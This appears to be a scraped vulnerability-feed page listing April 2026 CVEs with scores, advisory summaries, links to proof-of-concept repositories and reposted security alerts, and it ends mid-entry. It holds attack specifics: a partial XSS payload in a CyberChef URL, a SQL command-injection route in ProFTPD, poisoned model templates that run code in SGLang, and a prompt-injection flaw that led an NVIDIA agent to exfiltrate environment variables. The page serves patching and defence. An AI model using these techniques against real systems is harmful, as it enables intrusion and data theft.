🚨 CRITICAL: CVE-2026-26015 in DocsGPT 0.15.0-0.16.0 enables unauthenticated RCE via command injection (CVSS 10). All deployments at risk — patch to 0.16.0 or later now! https://radar.offseq.com/threat/cve-2026-26015-cwe-77-improper-neutralization-of-s-ba83675d #OffSeq #Vuln #RCE #DocsGPT

##

offseq@infosec.exchange at 2026-04-30T00:00:38.000Z ##

🚨 CRITICAL: CVE-2026-26015 in DocsGPT 0.15.0-0.16.0 enables unauthenticated RCE via command injection (CVSS 10). All deployments at risk — patch to 0.16.0 or later now! https://radar.offseq.com/threat/cve-2026-26015-cwe-77-improper-neutralization-of-s-ba83675d #OffSeq #Vuln #RCE #DocsGPT

##

CVE-2026-42167
(8.1 HIGH)

EPSS: 0.24%

updated 2026-04-29T16:16:25.303000

5 posts

mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).

2 repos

https://github.com/dinosn/proftpd-CVE-2026-42167-analysis

https://github.com/ZeroPathAI/proftpd-CVE-2026-42167-poc

Tinolle at 2026-04-29T18:25:57.814Z ##

CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce

##

threatcodex at 2026-04-29T14:17:39.181Z ##

CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
#CVE_2026_42167
https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce

##

Tinolle@infosec.exchange at 2026-04-29T18:25:57.000Z ##

CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce

##

threatcodex@infosec.exchange at 2026-04-29T14:17:39.000Z ##

CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
#CVE_2026_42167
https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce

##

thehackerwire@mastodon.social at 2026-04-28T23:27:41.000Z ##

🟠 CVE-2026-42167 - High (8.1)

mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42167/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7344
(8.8 HIGH)

EPSS: 0.01%

updated 2026-04-29T15:31:44

1 posts

Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

offseq@infosec.exchange at 2026-04-29T01:30:26.000Z ##

CRITICAL: Chrome <147.0.7727.138 on Windows is vulnerable to a use-after-free in Accessibility (CVE-2026-7344). Allows sandbox escape after renderer compromise. Patch now to mitigate risk. https://radar.offseq.com/threat/cve-2026-7344-use-after-free-in-google-chrome-1aabf4b9 #OffSeq #Chrome #Vuln #Cybersecurity

##

CVE-2026-5760
(9.8 CRITICAL)

EPSS: 0.38%

updated 2026-04-29T15:31:38

2 posts

SGLang's reranking endpoint (/v1/rerank) achieves Remote Code Execution (RCE) when a model file containing a malcious tokenizer.chat_template is loaded, as the Jinja2 chat templates are rendered using an unsandboxed jinja2.Environment().

1 repos

https://github.com/Stuub/SGLang-0.5.9-RCE

canartuc@mastodon.social at 2026-04-29T14:10:45.000Z ##

CERT/CC issued advisory VU#915947 for SGLang (an AI inference server), CVE-2026-5760, severity 9.8. A poisoned GGUF model file carries a chat-template that SGLang renders through Jinja2 with no sandbox. Arbitrary Python runs on the host. Same root cause as llama-cpp-python (2024) and vLLM (2025). Sandboxed Jinja2 existed the whole time and three frameworks left the line untouched. Any GGUF you did not build yourself runs code on load.

#AI #InfoSec #CyberSecurity #OpenSource #LLM

##

canartuc@mastodon.social at 2026-04-29T14:10:45.000Z ##

CERT/CC issued advisory VU#915947 for SGLang (an AI inference server), CVE-2026-5760, severity 9.8. A poisoned GGUF model file carries a chat-template that SGLang renders through Jinja2 with no sandbox. Arbitrary Python runs on the host. Same root cause as llama-cpp-python (2024) and vLLM (2025). Sandboxed Jinja2 existed the whole time and three frameworks left the line untouched. Any GGUF you did not build yourself runs code on load.

#AI #InfoSec #CyberSecurity #OpenSource #LLM

##

CVE-2026-7343
(9.8 CRITICAL)

EPSS: 0.03%

updated 2026-04-29T13:16:53.763000

1 posts

Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

offseq@infosec.exchange at 2026-04-29T00:00:40.000Z ##

⚠️ CRITICAL: CVE-2026-7343 in Chrome (Windows <147.0.7727.138) is a use-after-free in Views that could allow renderer sandbox escape. Patch ASAP to mitigate. No known exploits yet. https://radar.offseq.com/threat/cve-2026-7343-use-after-free-in-google-chrome-6725c92f #OffSeq #Chrome #Vulnerability #Security

##

CVE-2026-41873
(9.8 CRITICAL)

EPSS: 0.12%

updated 2026-04-29T13:16:51.850000

2 posts

** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover. This issue affects all versions of the Lua implementation of Pony Mail. There is a Python implementation under development under the name "Pony Mail Foal" that is not affected by this issue, but hasn't been released yet. As

Matchbook3469@mastodon.social at 2026-04-29T11:45:34.000Z ##

🚨 New security advisory:

CVE-2026-41873 affects Apache Pony Mail.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-41873-pony-mail-admin-takeover

#CVE #SecurityPatching #HackerNews

##

thehackerwire@mastodon.social at 2026-04-28T23:27:51.000Z ##

🔴 CVE-2026-41873 - Critical (9.8)

** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover.

This issue affects all versions of the Lua implementation of Pony Mail....

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41873/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42615
(7.2 HIGH)

EPSS: 0.01%

updated 2026-04-29T06:33:35

2 posts

GCHQ CyberChef before 11.0.0 allows XSS via Show Base64 offsets, as demonstrated by the /#recipe=Show_Base64_offsets('%3Cscript substring.

cR0w@infosec.exchange at 2026-04-29T04:41:24.000Z ##

RE: https://infosec.exchange/@cR0w/116483262430297764

lol

https://www.cve.org/CVERecord?id=CVE-2026-42615

##

offseq@infosec.exchange at 2026-04-29T04:30:25.000Z ##

🔎 XSS (HIGH, CVSS 7.2) in GCHQ CyberChef <11.0.0 (CVE-2026-42615): Improper input neutralization in Show Base64 offsets lets attackers inject scripts remotely — info theft/session hijack possible. No fix yet. Avoid untrusted input. https://radar.offseq.com/threat/cve-2026-42615-cwe-79-improper-neutralization-of-i-760a9adb #OffSeq #CyberChef #XSS

##

CVE-2026-23773
(4.3 MEDIUM)

EPSS: 0.01%

updated 2026-04-29T06:33:31

1 posts

Dell Disk Library for Mainframe, version(s) DLm 8700/2700 contain(s) a Server-Side Request Forgery (SSRF) vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Server-side request forgery.

offseq@infosec.exchange at 2026-04-29T06:00:26.000Z ##

MEDIUM severity SSRF (CVE-2026-23773) found in Dell DLm8700 📢. Low-priv remote attackers can trigger server-side requests. No known exploits, no patch yet — restrict access & follow vendor advisories. https://radar.offseq.com/threat/cve-2026-23773-cwe-918-server-side-request-forgery-08701a02 #OffSeq #SSRF #Dell #Cybersecurity

##

CVE-2026-7321
(9.6 CRITICAL)

EPSS: 0.04%

updated 2026-04-29T06:16:08.357000

2 posts

Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox 150, Thunderbird 150, and Firefox ESR 140.10.1.

Matchbook3469@mastodon.social at 2026-04-29T15:21:48.000Z ##

⛔ New security advisory:

CVE-2026-7321 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-7321-firefox-sandbox-escape-leaks-all-user-data

#Cybersecurity #ZeroDay #ThreatIntel

##

thehackerwire@mastodon.social at 2026-04-28T23:38:22.000Z ##

🔴 CVE-2026-7321 - Critical (9.6)

Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox ESR 140.10.1.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7321/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2024-1708
(8.4 HIGH)

EPSS: 81.62%

updated 2026-04-28T21:44:53.770000

8 posts

ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulnerability, which may allow an attacker the ability to execute remote code or directly impact confidential data or critical systems.

3 repos

https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708

https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE

https://github.com/Teexo/ScreenConnect-CVE-2024-1709-Exploit

AAKL at 2026-04-29T16:54:57.114Z ##

Broadcom has a new advisory for a critical vulnerability:

ESM Microservice 15.0 Vulnerability in Apache Tomcat https://support.broadcom.com/web/ecx/security-advisory #Broadcom #ApacheTomCat
---

Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports https://talosintelligence.com/vulnerability_info @TalosSecurity #zeroday
---

From yesterday:

CISA added two vulnerabilities to the KEV catalogue:

- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-32202

- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1708

- Also, one industrial vulnerability https://www.cisa.gov/news-events/ics-advisories/icsa-26-118-01 #CISA #Microsoft #vulnerability #infosec

##

beyondmachines1 at 2026-04-29T16:01:43.479Z ##

CISA Reports Active Exploitation of ConnectWise Flaw

CISA reports active exploitation of ConnectWise ScreenConnect (CVE-2024-1708) that allow for remote code execution and security mechanism bypasses. CISA is requiring patching by May 12, 2026.

**If you're using ConnectWise ScreenConnect, update to the latest patched version ASAP. Your ScreenConnect is being actively exploited to deploy ransomware. If you can't patch right away, restrict access to the ScreenConnect server to trusted networks only and monitor for any signs of unauthorized access or suspicious activity.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/cisa-reports-active-exploitation-of-connectwise-flaw-x-k-o-s-c/gD2P6Ple2L

##

undercodenews@mastodon.social at 2026-04-29T13:26:32.000Z ##

CISA Sounds Alarm Over Actively Exploited ConnectWise ScreenConnect Flaw, Immediate Patching Urged

Introduction The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning after confirming active exploitation of a serious vulnerability affecting ConnectWise ScreenConnect, one of the most widely used remote access and IT support platforms in enterprise environments. The flaw, tracked as CVE-2024-1708, has now been officially added to…

https://undercodenews.com/cisa-sounds-alarm-over-actively-exploited-connectwise-screenconnect-flaw-immediate-patching-urged/?utm_source=mastodon&utm_medium=jetpack_social

##

CapTechGroup@mastodon.social at 2026-04-29T12:54:25.000Z ##

CISA's KEV catalog now includes CVE-2024-1708 and CVE-2024-1709 (ConnectWise ScreenConnect auth bypass + RCE chain) plus CVE-2026-32202 (Windows Shell). APT28 has been weaponizing these since December 2025. The...

https://captechgroup.com/about-us/threat-intelligence-center/cisa-adds-connectwise-and-windows-flaws-to-kev-cat-8024b8?utm_source=mastodon&utm_medium=social&utm_campaign=threat_intel&utm_content=cisa-adds-connectwise-and-windows-flaws-to-kev-catalog-exploited-by-apt28

##

AAKL@infosec.exchange at 2026-04-29T16:54:57.000Z ##

Broadcom has a new advisory for a critical vulnerability:

ESM Microservice 15.0 Vulnerability in Apache Tomcat https://support.broadcom.com/web/ecx/security-advisory #Broadcom #ApacheTomCat
---

Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports https://talosintelligence.com/vulnerability_info @TalosSecurity #zeroday
---

From yesterday:

CISA added two vulnerabilities to the KEV catalogue:

- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-32202

- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1708

- Also, one industrial vulnerability https://www.cisa.gov/news-events/ics-advisories/icsa-26-118-01 #CISA #Microsoft #vulnerability #infosec

##

beyondmachines1@infosec.exchange at 2026-04-29T16:01:43.000Z ##

CISA Reports Active Exploitation of ConnectWise Flaw

CISA reports active exploitation of ConnectWise ScreenConnect (CVE-2024-1708) that allow for remote code execution and security mechanism bypasses. CISA is requiring patching by May 12, 2026.

**If you're using ConnectWise ScreenConnect, update to the latest patched version ASAP. Your ScreenConnect is being actively exploited to deploy ransomware. If you can't patch right away, restrict access to the ScreenConnect server to trusted networks only and monitor for any signs of unauthorized access or suspicious activity.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/cisa-reports-active-exploitation-of-connectwise-flaw-x-k-o-s-c/gD2P6Ple2L

##

secdb@infosec.exchange at 2026-04-28T20:00:14.000Z ##

🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0428)

CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2024-1708 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-1708)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 ; https://nvd.nist.gov/vuln/detail/CVE-2024-1708

⚠️ CVE-2026-32202 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-32202)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-32202 ; https://nvd.nist.gov/vuln/detail/CVE-2026-32202

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202

##

cisakevtracker@mastodon.social at 2026-04-28T18:00:52.000Z ##

CVE ID: CVE-2024-1708
Vendor: ConnectWise
Product: ScreenConnect
Date Added: 2026-04-28
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-1708

##

CVE-2026-38651
(8.2 HIGH)

EPSS: 0.04%

updated 2026-04-28T21:37:12

1 posts

Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key and use it to impersonate any host in the network, gaining access to sensitive information

thehackerwire@mastodon.social at 2026-04-28T22:34:34.000Z ##

🟠 CVE-2026-38651 - High (8.2)

Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-38651/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-32202
(4.3 MEDIUM)

EPSS: 7.19%

updated 2026-04-28T21:37:03

12 posts

Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.

AAKL at 2026-04-29T16:54:57.114Z ##

Broadcom has a new advisory for a critical vulnerability:

ESM Microservice 15.0 Vulnerability in Apache Tomcat https://support.broadcom.com/web/ecx/security-advisory #Broadcom #ApacheTomCat
---

Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports https://talosintelligence.com/vulnerability_info @TalosSecurity #zeroday
---

From yesterday:

CISA added two vulnerabilities to the KEV catalogue:

- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-32202

- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1708

- Also, one industrial vulnerability https://www.cisa.gov/news-events/ics-advisories/icsa-26-118-01 #CISA #Microsoft #vulnerability #infosec

##

cyberveille@mastobot.ping.moi at 2026-04-29T14:30:25.000Z ##

📢 CVE-2026-32202 : faille Windows Shell activement exploitée, liée à APT28
📝 ## 🗓️ Contexte

Publié le 28 avril 2026 par The Cyber Security Hub sur LinkedIn, cet article rapporte la confirmation par Microsoft de l'e...
📖 cyberveille : https://cyberveille.ch/posts/2026-04-29-cve-2026-32202-faille-windows-shell-activement-exploitee-liee-a-apt28/
🌐 source : https://www.linkedin.com/pulse/warning-windows-shell-flaw-cve-2026-32202-actively-em86f
#APT28 #CVE_2026_21510 #Cyberveille

##

CapTechGroup@mastodon.social at 2026-04-29T12:54:25.000Z ##

CISA's KEV catalog now includes CVE-2024-1708 and CVE-2024-1709 (ConnectWise ScreenConnect auth bypass + RCE chain) plus CVE-2026-32202 (Windows Shell). APT28 has been weaponizing these since December 2025. The...

https://captechgroup.com/about-us/threat-intelligence-center/cisa-adds-connectwise-and-windows-flaws-to-kev-cat-8024b8?utm_source=mastodon&utm_medium=social&utm_campaign=threat_intel&utm_content=cisa-adds-connectwise-and-windows-flaws-to-kev-catalog-exploited-by-apt28

##

cyberveille@mastobot.ping.moi at 2026-04-29T12:30:26.000Z ##

📢 Patch incomplet d'APT28 : CVE-2026-21510 laisse place à CVE-2026-32202, coercition d'authentification zero-click
📝 ## 🔍 Contexte

Publié le 23 avril 2026 par Maor Daha...
📖 cyberveille : https://cyberveille.ch/posts/2026-04-29-patch-incomplet-d-apt28-cve-2026-21510-laisse-place-a-cve-2026-32202-coercition-d-authentification-zero-click/
🌐 source : https://www.akamai.com/blog/security-research/incomplete-patch-apt28s-zero-day-cve-2026-32202
#APT28 #CVE_2026_21510 #Cyberveille

##

beyondmachines1 at 2026-04-29T11:01:43.821Z ##

Microsoft Confirms Active Exploitation of Windows Shell Flaw CVE-2026-32202

Microsoft confirmed active exploitation of CVE-2026-32202, a Windows Shell flaw that allows zero-click NTLM credential theft via malicious LNK files. The vulnerability is an incomplete fix for earlier RCE flaws used by the APT28 threat group in targeted espionage campaigns.

**Apply Microsoft's April 2026 patches immediately to all Windows systems, as this vulnerability steals your credentials just by viewing a folder containing a malicious shortcut file - no clicking required. Block outbound SMB traffic (ports 445 and 139) at your firewall to prevent credential theft.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/microsoft-confirms-active-exploitation-of-windows-shell-flaw-cve-2026-32202-0-8-6-0-i/gD2P6Ple2L

##

AAKL@infosec.exchange at 2026-04-29T16:54:57.000Z ##

Broadcom has a new advisory for a critical vulnerability:

ESM Microservice 15.0 Vulnerability in Apache Tomcat https://support.broadcom.com/web/ecx/security-advisory #Broadcom #ApacheTomCat
---

Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports https://talosintelligence.com/vulnerability_info @TalosSecurity #zeroday
---

From yesterday:

CISA added two vulnerabilities to the KEV catalogue:

- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-32202

- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1708

- Also, one industrial vulnerability https://www.cisa.gov/news-events/ics-advisories/icsa-26-118-01 #CISA #Microsoft #vulnerability #infosec

##

beyondmachines1@infosec.exchange at 2026-04-29T11:01:43.000Z ##

Microsoft Confirms Active Exploitation of Windows Shell Flaw CVE-2026-32202

Microsoft confirmed active exploitation of CVE-2026-32202, a Windows Shell flaw that allows zero-click NTLM credential theft via malicious LNK files. The vulnerability is an incomplete fix for earlier RCE flaws used by the APT28 threat group in targeted espionage campaigns.

**Apply Microsoft's April 2026 patches immediately to all Windows systems, as this vulnerability steals your credentials just by viewing a folder containing a malicious shortcut file - no clicking required. Block outbound SMB traffic (ports 445 and 139) at your firewall to prevent credential theft.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/microsoft-confirms-active-exploitation-of-windows-shell-flaw-cve-2026-32202-0-8-6-0-i/gD2P6Ple2L

##

benzogaga33@mamot.fr at 2026-04-29T09:40:03.000Z ##

Vols d’identifiants sur Windows : Microsoft révèle l’exploitation de la CVE-2026-32202 https://www.it-connect.fr/vols-didentifiants-sur-windows-microsoft-revele-lexploitation-de-la-cve-2026-32202/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #Microsoft #Windows

##

secdb@infosec.exchange at 2026-04-28T20:00:14.000Z ##

🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0428)

CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2024-1708 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-1708)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 ; https://nvd.nist.gov/vuln/detail/CVE-2024-1708

⚠️ CVE-2026-32202 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-32202)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-32202 ; https://nvd.nist.gov/vuln/detail/CVE-2026-32202

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202

##

Chris@mast.social at 2026-04-28T18:17:44.000Z ##

🛡️ Title: Windows Shell Spoofing Vulnerability
Description

🛡️ Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.

https://www.cve.org/CVERecord?id=CVE-2026-32202

#cybersecurity #security #windows #microsoft

##

cisakevtracker@mastodon.social at 2026-04-28T18:01:08.000Z ##

CVE ID: CVE-2026-32202
Vendor: Microsoft
Product: Windows
Date Added: 2026-04-28
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-32202

##

hackerworkspace@infosec.exchange at 2026-04-28T07:31:12.000Z ##

Microsoft Confirms Active Exploitation of Windows Shell CVE-2026-32202

https://thehackernews.com/2026/04/microsoft-confirms-active-exploitation.html

Read on HackerWorkspace: https://hackerworkspace.com/article/microsoft-confirms-active-exploitation-of-windows-shell-cve-2026-32202

#cybersecurity #threatintelligence #vulnerability

##

CVE-2026-24222
(8.6 HIGH)

EPSS: 0.04%

updated 2026-04-28T21:36:23

2 posts

NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environment variables not properly restricted during sandbox creation. A successful exploit of this vulnerability might lead to information disclosure.

thehackerwire@mastodon.social at 2026-04-28T22:33:42.000Z ##

🟠 CVE-2026-24222 - High (8.6)

NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environm...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24222/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability

##

CVE-2026-24204
(6.5 MEDIUM)

EPSS: 0.04%

updated 2026-04-28T21:36:23

1 posts

NVIDIA Flare SDK contains a vulnerability where an Attacker may cause an Improper Input Validation by path traversing. A successful exploit of this vulnerability may lead to information disclosure.

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability

##

CVE-2026-7288
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:25:44.987000

1 posts

A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used.

thehackerwire@mastodon.social at 2026-04-28T23:28:00.000Z ##

🟠 CVE-2026-7288 - High (8.8)

A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the a...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7288/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7248
(9.8 CRITICAL)

EPSS: 0.06%

updated 2026-04-28T20:25:44.987000

1 posts

A vulnerability was found in D-Link DI-8100 16.07.26A1. This affects the function tgfile_htm of the file tgfile.htm of the component CGI Endpoint. The manipulation of the argument fn results in buffer overflow. The attack can be executed remotely. The exploit has been made public and could be used.

offseq@infosec.exchange at 2026-04-28T09:30:29.000Z ##

⚠️ CRITICAL: CVE-2026-7248 in D-Link DI-8100 (fw 16.07.26A1) enables remote buffer overflow via 'fn' in CGI Endpoint. No patch available — restrict access & monitor for updates. Exploit code is public. https://radar.offseq.com/threat/cve-2026-7248-buffer-overflow-in-d-link-di-8100-798ac14e #OffSeq #DLink #Vuln #Infosec

##

CVE-2026-7244
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T20:24:20.377000

1 posts

A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The impacted element is the function setWiFiEasyGuestCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument merge results in os command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks.

offseq@infosec.exchange at 2026-04-28T11:00:37.000Z ##

Totolink A8000RU (v7.1cu.643_b20200521) faces CRITICAL OS command injection (CVE-2026-7244, CVSS 9.3). Remote, unauthenticated exploit possible. No patch yet — restrict mgmt access & monitor for updates. https://radar.offseq.com/threat/cve-2026-7244-os-command-injection-in-totolink-a80-f82a0e92 #OffSeq #Vuln #RouterSecurity #CVE2026_7244

##

CVE-2026-7240
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T20:24:20.377000

1 posts

A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setVpnAccountCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument User leads to os command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used.

offseq@infosec.exchange at 2026-04-28T08:00:31.000Z ##

🚨 CRITICAL OS command injection in Totolink A8000RU (7.1cu.643_b20200521) via setVpnAccountCfg lets remote attackers run arbitrary commands. No patch yet; restrict device access & monitor closely. CVE-2026-7240 https://radar.offseq.com/threat/cve-2026-7240-os-command-injection-in-totolink-a80-cd808cb1 #OffSeq #CVE20267240 #infosec

##

CVE-2026-5944
(8.2 HIGH)

EPSS: 0.09%

updated 2026-04-28T20:23:20.703000

1 posts

An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment environment without authentication. An unauthenticated attacker with network access can exploit this vulnerability by sending crafted requests to the expo

thehackerwire@mastodon.social at 2026-04-29T00:16:05.000Z ##

🟠 CVE-2026-5944 - High (8.2)

